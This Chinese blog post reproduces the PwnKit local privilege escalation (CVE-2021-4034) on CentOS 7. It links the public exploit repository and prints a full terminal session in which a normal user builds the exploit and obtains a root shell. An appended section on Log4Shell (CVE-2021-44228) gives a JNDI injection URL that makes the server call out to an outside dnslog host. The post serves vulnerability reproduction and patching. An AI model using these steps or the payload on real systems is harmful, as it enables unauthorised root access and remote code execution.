【漏洞复现】利用CVE-2021-4034对Linux提权

介绍

CVE-2021-4034存在于Polkit的pkexec中,pkexec是一个类似sudo的SUID root程序,允许授权用户作为其它用户执行程序,如未指定程序则运行默认shell,如果未指定用户名,则将作为管理员用户root执行。该漏洞自2009年5月起便已经存在,受影响的Linux发行版包括Ubuntu、Debian、Fedora、CentOS等。
【已解决】目前各发行版最新版本以及Polkit最新版本均已修复,请立即更新系统版本或Polkit版本。

环境准备

下载CentOS-7-x86_64-DVD-1804.iso
https://codeload.github.com/berdav/CVE-2021-4034/zip/refs/heads/main

提权复现

在这里插入图片描述

[cps@localhost ~]$ id cps
uid=1001(cps) gid=1001(cps) groups=1001(cps)
[cps@localhost ~]$ uname -r
3.10.0-862.el7.x86_64
[cps@localhost ~]$ uname -a
Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[cps@localhost ~]$ cd Desktop/
[cps@localhost Desktop]$ ls
CVE-2021-4034-main.zip
[cps@localhost Desktop]$ unzip CVE-2021-4034-main.zip 
Archive:  CVE-2021-4034-main.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
   creating: CVE-2021-4034-main/
  inflating: CVE-2021-4034-main/.gitignore  
  inflating: CVE-2021-4034-main/LICENSE  
  inflating: CVE-2021-4034-main/Makefile  
  inflating: CVE-2021-4034-main/README.md  
  inflating: CVE-2021-4034-main/cve-2021-4034.c  
  inflating: CVE-2021-4034-main/cve-2021-4034.sh  
   creating: CVE-2021-4034-main/dry-run/
  inflating: CVE-2021-4034-main/dry-run/Makefile  
  inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c  
  inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c  
  inflating: CVE-2021-4034-main/pwnkit.c  
[cps@localhost Desktop]$ cd CVE-2021-4034-main/
[cps@localhost CVE-2021-4034-main]$ ls
cve-2021-4034.c  cve-2021-4034.sh  dry-run  LICENSE  Makefile  pwnkit.c  README.md
[cps@localhost CVE-2021-4034-main]$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
[cps@localhost CVE-2021-4034-main]$ ls
cve-2021-4034    cve-2021-4034.sh  gconv-modules  LICENSE   pwnkit.c   README.md
cve-2021-4034.c  dry-run           GCONV_PATH=.   Makefile  pwnkit.so
[cps@localhost CVE-2021-4034-main]$ whoami
cps
[cps@localhost CVE-2021-4034-main]$ id cps
uid=1001(cps) gid=1001(cps) groups=1001(cps)
[cps@localhost CVE-2021-4034-main]$ ./cve-2021-4034
sh-4.2# whoami
root
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1001(cps) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#                                                                                                                      

附:参考文档

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
https://ubuntu.com/security/CVE-2021-4034
https://access.redhat.com/security/cve/CVE-2021-4034
https://security-tracker.debian.org/tracker/CVE-2021-4034

### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载限、启用严格的输入校验机制等手段进一步增强安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值